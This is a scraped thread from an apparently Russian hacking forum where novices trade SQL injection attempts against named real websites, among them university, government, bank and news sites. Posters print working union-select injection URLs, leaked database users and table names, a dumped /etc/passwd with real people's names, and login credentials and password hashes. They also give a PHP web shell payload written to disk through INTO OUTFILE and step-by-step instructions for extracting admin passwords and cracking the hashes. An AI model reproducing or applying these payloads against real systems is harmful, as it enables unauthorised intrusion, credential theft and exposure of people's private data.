а вот когда вводил http://www.freerealty.ru/mail.php?cat=108&de=1+order+by+12/*
писало типа Ошибка: Unknown column '12' in 'order clause'
значит количество полей 11
смотри http://www.freerealty.ru/mail.php?cat=108&de=-1+union+select+111,222,333,444,555,666,777,888,999,101010,111111--
правда понятия не имею где там ты будешь инфу на форму выводить.. поюзай ещё... мож чё выйдет
помогите с sql inj
parimatch.com
Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
при
1' or 1=(select account, fname, lname, passwd, oldlogin, oldpasswd, passwdt from wdeposit)--
ошибка:
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS. (severity 16) in /www/inc/headers.class.inc on line 120
1' or 1=(SELECT top 1 account from wdeposit)--
ничего не дает
при: ' union select account, fname, lname, passwd, oldlogin, oldpasswd, passwdt from wdeposit--
ошибка:
Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 355840 bytes) in /www/inc/headers.class.inc on line 120
Warning: mssql_query() [function.mssql-query]: Query failed in /www/inc/session.class.inc on line 98
чего то я делаю неправильно хз
[b]спосибо за ответ но все таки я не понял разеснения ,что если я знаю вывод точный DATABASE() version() and user() что дальше с этим делать ,но извените я тупой,,,или этого мало и куда это сувать толька не туда ,не откуда выходит какaшка я поделу,а вот хочеш ламонуть один зайтик a,интерисуешся лошедями ,трой...каторые уже больны могу дать адрес но там эпидемия,спосибо
,а вот хочеш ламонуть один зайтик [color="#ff0099"]http://www.oae.gov.tr/webmail/source/index.php
[/color][/b][color="#0066cc"][b]спосибо за ответ но все таки я не понял разеснения ,что если я знаю вывод точный DATABASE() version() and user() что дальше с этим делать?[8D][/b][/color]
спосибо за ответ но все таки я не понял разеснения ,что если я знаю вывод точный DATABASE() version() and user() что дальше с этим делать ,но извените я тупой,,,или этого мало и куда это сувать толька не туда ,не откуда выходит какшка я поделу,а вот хочеш ламонуть один зайтик a,интерисуешся лошедями ,трой...каторые уже больны могу дать адрес но там эпидемия,спосибо
,а вот хочеш ламонуть один зайтик http://www.oae.gov.tr/webmail/source/index.php[:-]
парни, вот я чисто случайно на одном крупном украинском сайте нашёл такую весчь
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/pogodabu/pogoda.ua/index.php on line 14
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/pogodabu/pogoda.ua/index.php on line 26
вот......просто подставил айди другой, и мне выбило.....можно с этого что-нибудь поиметь??
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/pogodabu/pogoda.ua/themes/weather/_des.php on line 28
ещё вот это кстати выдало
ВИДЕО SQL-ИНЪЕКЦИЯ. КЛУБ ЛЮБИТЕЛЕЙ BMW...
http://depositfiles.com/files/4550069
Это моё первое видео, так что ногами не бить)))
доброе утро мир,значет я врубился вчем была проблема нужно было после того как узнав столбец премерно так +union+select+1/*потом срубаеш еденицу и впихевоеш туда попарядку user() database()version() потом сносиш весь текст и втыкаеш туда;туда такое +UNION+SELECT+table_name+from+information_schema.tables+limit+1,1/* а limit едет в переборку 2,1 3,1и.тд у меня вышло 27,1перебрал заднию однерку тоже потом вышло такое :
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
правдо не все напесал но всетаки что дальше после этих таблиц до меня трудно даходит я пробывал ставить это +UNION+SELECT+columns_name+from+information_schema.columns+where+table_name='COLLATIONS'/*
не прокатывает еггог выбевает подскажите что дальше пожалуйста.
осторожно с хохлами там у них троян сторож перескакевает кашперского.[:@]
так уменя этих столбцов вибело смотри :
[b][color="#660099"]COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
USER_PRIVILEGES
VIEWS
document
main
menus
moderator
picture
zakup
annons
count_link
forum
hor_menu
TRIGGERS[/color][/b]
больше там нету пусто едет и решил по парядку с COLLATIONS.
хорошо буду дальше четать
спосибо тебе а вот вопрос можно через смd далбонуть примерно так,
[b][color="#ff0000"]C:\>sqlinjector -t www.example.com -p 80 -f request.txt -a query -o where -qf query.txt -gc 200 -ec 200 -k 152 -gt Science -s mssql[/color][/b]
s odnogo site naschol naberi u sebja [b][color="#660000"]cmd.exe
все здесь описанные команды - это команды cmd, т.е. ты должен открывать бокс ДОС (приглашение ввода), чтобы выводить команды:
для этого на "старте", "экспорте", "cmd"... tracert
Адрес Mac устанавливают
либо командой "getmac", либо с " ipconfig / всех "
Связь испытывают
"ping xxx.xxx.xxx.xxx"
xxx.xxx.xxx.xxx является адресом IP
например, ping 1 921 680,1
Ping выводится для 1 921 680,1 с 32 Бт данных:
Ответ 1 921 680,1: Bytes=32 время <1ms TTL=128
Ответ 1 921 680,1: Bytes=32 время <1ms TTL=128
Ответ 1 921 680,1: Bytes=32 время <1ms TTL=128
Ответ 1 921 680,1: Bytes=32 время <1ms TTL=128
Статистика Ping для 1 921 680,1:
Пакеты: Послано = 4, принятые =4, Теряли = 0 (0% потери)...
если устройство с 1 921 680,1 называется в этом случае досягаем!
Список всех связей сети:
командой: "netstat-ano"
Ты получаешь тогда список всех связей сети,
Чтобы идентифицировать программы, PID (процесс Identification) стоит справа
Список всех связей сети:
командой: "netstat-ano"
Ты получаешь тогда список всех связей сети,
Чтобы идентифицировать программы, PID (процесс Identification) стоит справа
Открывай с [Strg-Alt-Entf] менеджера Task. Выбирай "представление", "расщелины"
Делай галочку перед PID. Теперь ты смотришь, какие программы скрываются за номерами.
из адреса IP адрес MAC najti:
сначала адрес IP anpingen ("ping xxx.xxx.xxx.xxx")
xxx.xxx.xxx.xxx является адресом IP
дают тогда "arp-a" и ты получаешь список с адресами IP и принадлежащими к этому адресами MAC:
Schnittxstelle: xxx.xxx.xxx.xxx---xxxxxx
Интернет-адрес Physikal. Адрес тип
xxx.xxx.xxx.xxx xx-xx-xx-xx-xx-xx динамично
xxx.xxx.xxx.xxx xx-xx-xx-xx-xx-xx динамично
Запросы в сервере ДНК
"NSLOOKUP", опросы в сервере ДНК проводят. чтобы испытывать реверсы Lookupzone сервера ДНК (преобразование ДНК в адресе IP). Как ответ ты должен был получать имя сервера ДНК, иначе Lookupzone сервера правильно не зарегистрирован реверсы!
Routingtabellen сообщают
"route print"
Адрес IP государственной земли rausfinden
"tracert www.libe.net" сообщают адрес IP государственной земли и преследуют пути вплоть до государственной земли (какие серверы, Router... пройдут вплоть до государственной земли)
Пользователи вкладывают
net user пользовательское имя Пароль/add
если ты хочешь вкладывать, например, пользователя "libe" с паролем "привет", это выглядит следующим образом:
net user libe привет/add
Пользователи угасают
net user пользовательское имя/delete
если ты хочешь аннулировать, например, пользователя "libe", это выглядит следующим образом:
net user libe/delete
ОСТОРОЖНОСТЬ: этой командой пользователь и соответственно его установки unwiederuflich аннулируются!
[/color][/b]
извеняюсь сбился стемы вот запрос выгледит таким всеровnо выбевает еrror
[b][color="#006600"]+UNION+SELECT+columns_name+from+information_schema.columns+where+table_name='moderator'/*[/color][/b]
[color="#cc0000"]Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /www/htdocs/kaznpu/function.php on line 16[/color]
даже пробывал в конце добавить+lim1,1/*невыходит подскожите пожалуйста
добрый вечер есть программа SQL Power Injector на англиском чистая на вирус проверена там есть датай rar и msi я на мsi закачал,просто не как не могу розобраться sql-языком для скачки [b][color="#cc0033"]https://sourceforge.net/project/showfiles.php?group_id=159131&package_id=178588&release_id=523434[/color][/b]
правильно будет :
+UNION+SELECT+column_name+from+.....
а не
+UNION+SELECT+column[b]s[/b]_name+from+.....
и соответственно:
+UNION+SELECT+table_name_name+from+.....
и если ковычка всетаки фильтруется можно попробывать или:
moderator = 0x6d6f64657261746f72
moderator = Char(109,111,100,101,114,97,116,111,114)
не получается [b][color="#cc0033"]даломайте[/color][/b][:@] его кто нибуть pleaise,bitte на доел этот казахский site даю первою наводку напешите сздесь на форуме кто его первый доломает ,а мне нужно почетать чтоб ломать научиться.
[b][color="#00cc00"]http://www.kaznpu.kz/kz/?annons=-1+union+select+1/*
user:muha@irq.kaznpu.kz
database:kaznpu
version:5.0.37-community-log
system_user:muha@irq.kaznpu.kz
user:muha
http://www.kaznpu.kz/kz/?annons=-1+UNION+SELECT+table_name+from+information_schema.tables+limit+1,1/*
COLLATIONS
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
USER_PRIVILEGES
VIEWS
document
main
menus
moderator
picture
zakup
annons
count_link
forum
hor_menu
TRIGGERS[/color][/b]
[i][color="#ff0033"]pleaise cracken [/color][/i]
[b][color="#660000"]
[color="#3300cc"]http://kostanaylife.kz/index.php?pname=iass&type=4&view=1762+union+select+1,2,3,4,5,6,7/*[/color]
user:t314kz_adminkl@localhost
database:t314kz_dbKLNew
version:4.1.22-log[/color][/b]
есть от Firefox Plugin для sql injection Hackbar 1.1.1 add to Firefox
для скачки
[b][color="#990000"]http://translate.google.com/translate?hl=de&sl=en&u=http://devels-playground.blogspot.com/2007/08/union-select-column-count.html&sa=X&oi=translate&resnum=6&ct=result&prev=/search%3Fq%3D%252BUNION%252BSELECT%2B1,2,3,4,5%2Bsql%2Binjection%26hl%3Dde%26rlz%3D1B3GZFB_deDE266DE266%26sa%3DX[/color][/b]
[b][color="#990000"]I have only this file_priv, can I use it for shell , if no, tell me please, how can I this do
union select[color="#ff0033"] file_priv[/color] from mysql.user where user=left(user(),locate(0x40,user())-1)/*[/color][/b]
вот еще прикол что я сегодня с3делал с javascript и казахское телевидиние воткнул туда с помрщью xss техно поет там, там же попробывал sql injection,[color="#009900"]site1 xss[/color]
www.krasota.ru and http://www.krasota.ru ------------->xss
[i]sql injction :
[b][color="#cc0033"]http://www.krasota.ru/krasota/articles/show.htpl?id=1875+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(user(),%20%200x71),0x71),6,7,8,9,10,11/*[/color][/b]
[b][color="#990066"]http://www.krasota.ru/krasota/articles/show.htpl?id=1875+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(USER(),%20%200x71),0x71),6,7,8,9,10,11/*
/data/www/htdocs/krasota.ru/htdocs/forum/index.phtm
DATABASE:krasota_v3
USER:krasota_v3@lbarbero-12.m-10.ru
version:4.1.16-standard-log
дальше не смог не чего помоему там нету,bey
[/color][/b][/i]
Если указан тип «полный путь», тогда необходимо также указать для параметра аргумента [i]param [/i] полный путь к DLL компонента. В противном случае будет возвращено сообщение об ошибке.
Если ничего не указано либо указано «all», информация возвращается для всех компонентов.
[ [b]@param[/b] [b]=[/b] ] [i]param[/i] В зависимости от типа компонента указывается одно из следующих значений: языковый стандарт (LCID), расширение файла с префиксом «.», полный PROGID обработчика протокола или полный путь к DLL-компоненту.
[b][color="#ff0000"]http://www.kaznpu.kz/kz/?annons=-1+union%20+select+%20file_priv%20from%20mysql.user%20where%20user=left(user(),locate(0x40,user())-1)/*
http://www.kaznpu.kz/kz/?annons=-1+union%20select%20@@version_compile_os%20/*
[/color][/b][b]pc-linux-gnu
[/b][b]Y
I have got this data after file_priv, what does it mean and I am interesting how can I do shell.
[/b]
[color="#660000"]PROPHET07 [/color]вы на связе
[b]падскажи если кто знает как правельно сделать [/b]это я чтото запутался
[b]примерно tak[/b] file_priv ('/www/htdocs/kaznpu/ php. shell ') это я сам выдумал не знаю правельно это
[b][color="#006633"]как правельно написать это для наченающих просьба[/color][/b]
insert into User (Host, User, Password, Select_priv, Insert_priv, Update_priv, \
Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, \
File_priv, Grant_priv, References_priv, Index_priv, Alter_priv) values \
(‘localhost’, ‘New_User_Name’, password(‘new_password’), ‘Y’, ‘Y’, ‘Y’, ‘Y’, \
‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’, ‘Y’);
shell> mysql mysql.
mysql> insert into user (host,user,password)
values('localhost','custom',password('stupid'));
mysql> insert into user (host,user,password)
values('server.domain','custom',password('stupid'));
mysql> insert into user (host,user,password)
values('whitehouse.gov','custom',password('stupid'));
mysql> insert into db (host,db,user,Select_priv,
Insert_priv,Update_priv,Delete_priv, Create_priv,Drop_priv)
values ('localhost','bankaccount','custom',
'Y','Y','Y','Y','Y','Y');
mysql> insert into db (host,db,user,Select_priv,
Insert_priv,Update_priv,Delete_priv,
Create_priv,Drop_priv)
values ('%','customers','custom',
'Y','Y','Y','Y','Y','Y');
mysql> quit
shell> mysqladmin reload
здрасте!!
я тут получил etc/passwd но не могу понять что тут есть хорошое???может кто подсказать????
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:*:0:0:jail44h root:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty
:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games
pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man
Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin ftp:*:21:5
:Anonymous FTP Admin:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue
:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind
Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:
64:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic
:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World
Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent
:/usr/sbin/nologin zaa:*:3909:20:Alexander Zhuravlev:/u/zaa:/bin/csh shurik:*:4128:20:Alexander E. Grushin
:/u/shurik:/bin/csh mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125:Postfix Mail System
:/var/spool/postfix:/usr/sbin/nologin lesha:*:5433:20:Alexey Kurepin:/u/lesha/:/bin/tcsh bks:*:5432:20
:Konstantin Belyaev:/u/bks/:/bin/tcsh grigoriy:*:5435:20:Grigoriy Nikitin:/u/grigoriy/:/bin/csh
ссылку дай Pirat_sg
Зафильтровали
у меня вопрос:
Собственно сам объект http://www.fasie.ru/index.php?rid=120
при попытке подобрать количество полей способом "order by" получается следующее http://www.fasie.ru/index.php?rid=120%20order%20by%201/*
всё в порядке ставим больше и тут опа http://www.fasie.ru/index.php?rid=120%20order%20by%2010/* немно поманипулировав с цифрами у меня получилось что полей не больше одного т.к. подставляя число 2 вылетает ошибка Новедь не может количество полей быть 1 или всётаки может и там лежит логин и пасс админа?Или я где то ошибся?
а зачем она (ссылка) тебе????:)
http://quality.ulstu.ru/index_base.php?adr=/etc/passwd&id=26
[color="#009900"][b]приветствую всех мне нужен совет[/b][/color][color="#009900"][b][link=http://forum.xakep.ru/forumid_275/p_1/tmode_1/smode_1/tt.htm]Для начинающих[/link][/b][b], что сделать[/b],
как вызвать шелл исли мне езвестен логин и пасс
[/color]
например
http://www.kaznpu.kz/kz/?annons=-1+union%20+select+%20file_priv%20from%20mysql.user%20where%20user=left(user(),locate(0x40,user())-1)/*
http://www.kaznpu.kz/kz/?annons=-1+union%20select%20@@version_compile_os%20/*
http://www.kaznpu.kz/kz/?annons=-1+UNION+SELECT+concat_ws(0x3a,login,pswd,fio)+from+moderator/*
http://www.kaznpu.kz/kz/?annons=-1+union+select+1/*
user:muha@irq.kaznpu.kz
database:kaznpu
version:5.0.37-community-log
system_user:muha@irq.kaznpu.kz
+union+select+"<?system($_GET[cmd]);?>"+from+mysql.user+into+outfile+'/www/shell.php'/*СЮДА ЧТО ВОДИТЬ не кто не подскажет
что я вообще не правельно делаю
[size="2"][b][color="#990000"]c99Shell v.10 pre-release build #16 [color="#006666"]это я хочу и как получить шелл[/color][/color][/b][/size]
elexir
+union+select+'<?php system($_GET[cmd]); ?>'+from+mysql.user+into+outfile+'/home/site/public_html/shell.php'/*
Получить шелл?
что для этого нам нужно знать установочную дирректорию сайта? Составляем запрос, записывающий в файл шелл. Допустим уст. дирректория "/home/site/public_html/"
Тогда запрос kakoj
как узнать установачную дерикторию нужно вызвать ошибку?
[b]Warning[/b]: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in [b]/www/htdocs/kaznpu/function.php[/b] on line [b]16[/b]
[b]Warning[/b]: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in [b]/www/htdocs/kaznpu/function.php[/b] on line [b]16[/b]
[link=http://www.kaznpu.kz/kz/?parent=Main]Бастап?ы бет[/link] / Хабарландыру
и потом например взять это [b]/www/htdocs/kaznpu/function.php или как
и состовить шелл [/b]+union+select+'<?php system($_GET[cmd]); ?>'+from+mysql.user+into+outfile+'[b]/www/htdocs/kaznpu/[/b]shell.php'/*
правильно я сзделал запрос я обрашаюсь к профeсcеоналам или к тем кто это уже съел.....
[link=http://forum.xakep.ru/m_978175/mpage_8/%3Cimg%20style=]">[/link]
[color="#ff0033"]shell
http://example.com/shell.php.gif?cmd=
[/color]
[link=http://ff.net13.info/uploads/photo-508.jpg][image]http://ff.net13.info/uploads/photo-508.jpg[/image][/link][image]http://forum.xakep.ru/image/s1.gif[/image]
[align=center][image]http://forum.xakep.ru/upfiles/83837/053B3519E7B544DAB744FBB3AB80DC28.gif[/image][/align]
[link=http://forum.xakep.ru/showProfile.aspx?memid=83837]dos 999 [color="#009900"][b]приветствую[/b][/color][/link]
titleAndStar(240,21,false,false,"","")Junior Member
[align=center][image]http://forum.xakep.ru/upfiles/83837/053B3519E7B544DAB744FBB3AB80DC28.gif[/image][size="2"][b][color="#990000"][color="#006666"]как получить шелл[/color][/color][/b][/size]?[/align]
[link=http://forum.xakep.ru/showProfile.aspx?memid=97670]provider[/link] ну ты отжёг =)
нафига фотки то из профиля вставлять))) или в реале меня знаеш?
про какой шел идёт речЬ?
привет на канетцто кто-то ответил речь идет о sql inection я писал уже об этом прочитай по подробней можем даже скентаватьса!
http://www.vt8x.yurx.com/72_232_6_130%20-%20c99shell.htm
[size="3"] тут шелл [/size]
+union+select+'<?php system($_GET[cmd]); ?>'+from+mysql.user+into+outfile+'/home/site/public_html/shell.php'/*
ты уверен что этот запрос прошёл нормально?
нет конечно поетому я и задаю много вопросов ,там ты мою inection видел , они филтра по наставили какой теперь шелл может быть,забыть просто хотел
узнать как правельно подбераются к шелли это уже почти фенал или как ,запрос не знал для шелли и как правельно запрашевается или делайтся если шелл
в твоих руках это Gut.пиши если знаешь про шелл тут екземплар смотри куда я хотел...
[link=http://www.vt8x.yurx.com/72_232_6_130%20-%20c99shell.htm]http://www.vt8x.yurx.com/72_232_6_130%20-%20c99shell.htm[/link]
если что обрашусь к тебе ...
1. Не совсем тебя понимаю, но к шелу нужно обращаться туда куда ты его сохранял, если он там есть то всё буит ОК.
2. Если ты не уверен запрос проходит или нет, то почитай мартовский номер хакера, там описывались слепые инъекции, в твоём случае думаю самое оно.
[link=http://www.turtess.com/city.php?city_id=-1+union+select+1,user.usrname+from+mysql.user/]http://www.turtess.com/city.php?city_id=-1+union+select+1,user.usrname+from+mysql.user/[/link]*
SELECT command denied to user 'turtess'@'localhost' for table 'user'
Помогите выполнить запрос UPDATE или INSERT или чтонебуть типа LOADFILE();
Там на сайте странная зашита. Спасибо всем кто откликнеться
-------
Интересует вообще можно что-то ещё сделать. Например безконечный выбор данных и тп.
[link=http://forum.xakep.ru/showProfile.aspx?memid=55850]S00pY[/link]. ПРО XSS я знаю.
Дак есть способ ломануть сайт ?
Если есть подскажи пожалуйста куда рыть
Спасибо!
Можно про Шел подробней, я так не инеразабрался с командой into outfile
Странно а тогда чем этот форум надо ? ))
Ты так и не подсказал и не ответил не на один мой вопрос ))
Я думал этот форум специально создан что бы помогать новичкам а не посылать их в ЛЕс ))
1
Превед дебилам типо Dimonelite :D
-18 за один день - это рекорд))
Приветствую.
Господа помогите разобраться инет уже замучался рыть, в итоге вышел на вас.
Проблема вот в чем.
=1+union+select+null,null,null,null/* Два последних null'a работают, выводится и user() и database()
Но этого же мало ? :)
Везде пишут что мол можно сделать такой запрос
1+union+select+null,null,mysql.user.password,null+from+msql.user/*
Выдаёт Ошибка запроса: 1142: select command denied to user: 'service@localhost' for table 'user'
Подскажите что тут нужно подбирать ?
Нужно ли меня значения в строчке mysql.user.password или её не трогать а подбирать в
msql.user
Буду очень благодарен.
2 [link=http://forum.xakep.ru/showProfile.aspx?memid=103767]Lancaster[/link]
А нет ли у тебя ошибки ? ;)
1+union+select+null,null,mysql.user.password,null+from+[color=#ff0000]msql.user[/color]/*
Может ты хотел написать mysql.user
Попробуй, может дело в этом.
2 b3d3l
Это я понял. Советом поможешь ?[8|]
Здесь уже ничего нельзя сделать ?
2 Red_Red1
Мне тоже паказалось подозрительным это, исправлял, но ничего не изменилось.
ты прав [link=http://forum.xakep.ru/showProfile.aspx?memid=103737]Red_Red1[/link] /не правильный подбор ctoлбцов, не так он все начел /помошь тебе тут/
http://forum.antichat.ru/printthread.php?t=21336&page=518&pp=10+union+select+1,2,3,4/*
https://forum.antichat.ru/thread20879.html
https://forum.antichat.ru/showthread.php?t=7119
https://forum.antichat.ru/showthread.php?t=7136
https://forum.antichat.ru/showthread.php?t=7157
https://forum.antichat.ru/showthread.php?p=613095
[link=http://forum.xakep.ru/showProfile.aspx?memid=83837]dos 999[/link]
не подскажешь почему вход не доступен/нет доступа/
взлом
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8/*
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,database(),8/*
Database:nsncsu2_columnists
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,user(),8/*
users:nsncsu2_members@localhost
+union+select+1,2,3,4,5,6,concat_ws(0x3a,password),8+from+admin+limit+0,1/*
[color="#cc0000"]Table 'nsncsu2_columnists.users' doesn't exist[/color]
я красным вывел чтоб понятней было в чем тут прокол блин...
2 provider
Что конкретно у тебя не выходит с этой скулей?
Вот запрос который показывает таблицу юзеров (там где лежат пароли ;))
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,table_name,8+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)/*
Вот вывод "нужных" колонок
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,column_name,8+from+information_schema.columns+where+table_name=CHAR(99,95,114,101,103,95,117,115,101,114,115)+limit+0,1/*
username
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,column_name,8+from+information_schema.columns+where+table_name=CHAR(99,95,114,101,103,95,117,115,101,114,115)+limit+2,1/*
password
Это вывод имени базы (она нужна так как таблица юзеров в другой базе)
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,table_schema,8+from+information_schema.columns+where+table_name=CHAR(99,95,114,101,103,95,117,115,101,114,115)/*
Вот вывод "нужной" инфы
http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,concat(username,CHAR(58),password),8+from+nsncsu2_members.c_reg_users/*
Лимитом перебираем юзеров или через WHERE указываем нужный логин
Потом идем сюда http://hashcracking.info/index.php
и находим пароли к полученым хешам ;)
Думаю этого хватит...
Да и еще, а где админка, я не нашел (правда сильно и не искал :))
Удачи.
[link=http://forum.xakep.ru/showProfile.aspx?memid=103737]Red_Red1[/link]
с чаром ты крута дал +union+select+1,2,3,4,5,6,concat(username,CHAR(58),password),8+from+nsncsu2_members.c_reg_users/*
+2 тебе
http://www.procreditbank.ba/eng/str.asp?id=138'
Помогите,никак не могу раскурить...
хацкеры, помогите советом. сам нуп пока что)))
есть сайтег. на нем есть поля для ввода (пас и лог)
если ввести в логин admin' то вылетает следуюющее:
Query (SELECT account_id FROM login WHERE BINARY userid = BINARY 'admin'' AND BINARY user_pass = BINARY 'что-то в md5' ) failed You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'что-то в md5'' at line 2
К сожаленью в сети много ресурсов по инъекциям вида id=32423' но по этому поводу ничо не нашел. расскажите вкраце плиз что мне делать дальше
[link=http://forum.xakep.ru/showProfile.aspx?memid=52024]R.D.X[/link]
Если на сервер передан параметр [size="3"][b][color="#cc0000"]id[/color][/b][/size] то выполнится следующий SQL-запрос:
http://ru.wikipedia.org/wiki/%D0%98%D0%BD%D1%8A%D0%B5%D0%BA%D1%86%D0%B8%D1%8F_SQL
http://www.ascon.ru/index.php?news=417+union+select+1,2,34,5,6,7/*
http://www.ascon.ru/index.php?news=417+union+select+1,2,3,4,5,6/*
http://www.ascon.ru/index.php?news=417+union+select+1,2,3,database(),5,6/*
http://www.ascon.ru/index.php?news=417+union+select+1,2,3,database(),user(),6/*
[color="#00cc00"][b]webapache@localhost[/b][/color]
http://www.ascon.ru/index.php?news=417+union+select+1,version(),3,database(),user(),6/*
http://www.ascon.ru/index.php?news=417+union+select+1,2,3,4,table_name,6+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)/*
вывод лимита...
[color="#3300cc"]smfe_members
poll_user
en_members
vertpoll_user
smfe_members
[color="#000000"]ни кому ни встречалось слова [color="#cc0000"]%bar% [color="#000000"]что это вообще...[/color][/color][/color]
[color="#000000"]http://www.ascon.ru/index.php?news=417+union+select+1,2,3,4,(C HAR(37,%2098,%2097,%20114,%2037)),6/*
[b][color="#ff0000"]%bar%
[/color][/b][/color][/color]не выходит с этой ,чары ни дают результатов,,,->
[color="#3300cc"][color="#000000"][b][color="#ff0000"]
[color="#3300cc"][size="1"]WHERE foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))
load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))
AES_DECRYPT(AES_ENCRYPT(user(),%20%200x71),0x71)
LOAD_FILE(0x2F6574632F706173737764)/*
+concat_ws(0x3a,login,pswd,fio),5,6+from+webapache@localhost/*[color="#000000"]
вопрос простой ни мог сделать на этой странице (LOAD_FILE),есть у каво-нибудь варианты...[/color]
[/size][/color][/color][/b][/color][/color]
Ответ тоже простой: у юзера, под которым выполняются запросы в результате sql-inj, нет прав работать с файлами.
обычно можно узнать, глянув на поле FILE_PRIV в mysql.user, но в твоем случае и к mysql.user доступа нет. так что на load_file можешь забить.
люди я извеняюсь если не туда отписал но всеже
у меня такая проблема есть сервак на нем крутится FreeBSD версию не знаю:( главный сайт давольно токи хорош и там я уезвимостей не нашел а вот под домены дырявые но из за молого количества скриптов больно уезвимостей не ту на 1 сайте есть слепая инекция на другом нормальная на одном инклюд. БД построена разумно у других сайтов доступа на всю базу нет /etc/passwd не чего нужного не дал что делать дальше не знаю посоветуйте чтонибудь?? хотел через инекцию получить шелл но пути нету (
[link=http://forum.xakep.ru/showProfile.aspx?memid=85947]Pirat_sg[/link]
а можно узнать где ты ходишь какой сайт...
Dimonelite огромное СПС за инфу!!!обязательно попробую:)
provider извени но адрес сказать не могу:)
взлом
для информации ,кому нужно берите...
http://forum.shock-world.com/index.php?act=UserCP&CODE=00
Имя пользователя (login) SlavuKk7
Пароль SlavuKk7
ID пользователя: 333336
or1=1--
А тут ключик
ea53631b06c3ecdeca4006c63cbc7d62
1014e5a003d614f9a41d07c3780006cd
народ, помогите плиzzz. ест два сайта stars.com.ua и fotomodels.us фактичеки одинаковые по своему наполнению. руководитель - долбаный аферист - кидает моделей. знакомая попала - решил помочь... перерыл инэт - нашёл на сайте уязвимость http://stars.com.ua/models/_show_whole_kasting.php?page=2&id=-41+union+select+1,2,3,4,5 -- откуда извлёк:
database(): starscom_stars
user(): starcom_star@localhost
version(): 4.1.22 standart
а также методом подбора таблицы models, kasting, news, в которых нет необходимой мне инфы... доступ для пользователя starcom_star@localhost закрыт. что делать дальше? что неужели никак нельзя пробить этот грёбаный сайт? помогите узнать наверняка есть ли уязвимость здесь http://stars.com.ua/new/index.php?do=lastcomments&userid=1? заранее благодарен.
Имеется сайтец на joomla.
с помощью тока вышедшей уязвимости разхачил несколько страниц.
обычная скл-инъекция,результат-выплевывает имя юзера:хэш мд5..и еще какую то непонятную вещь
admin:f3fa6aec117817bbc98d3e3964089904:NNAcJgMywSx2DM50
Что означают символы после второго двоеточия?Ответьте пожалуста.
dubazzz т.к. MySQL 4 то придется подбирать названия таблиц самому! так что иши думай если найдеш то адрес админки http://stars.com.ua/models/admin это я так на всякий вдруг понадобится,а на mysql. ? у тебя не хватает прав:)
Люди нужна помощь. На некотором сайте при определенной подстановке -1+order+by+20/* выводится ошибка:
